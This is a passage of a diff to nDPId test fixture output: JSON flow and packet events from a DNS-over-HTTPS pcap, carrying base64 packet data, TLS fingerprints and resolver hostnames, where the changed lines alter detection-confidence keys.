cco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3j
FhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5eu
uv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="} 
-01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHd
sHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0ey
Us26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="} -01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
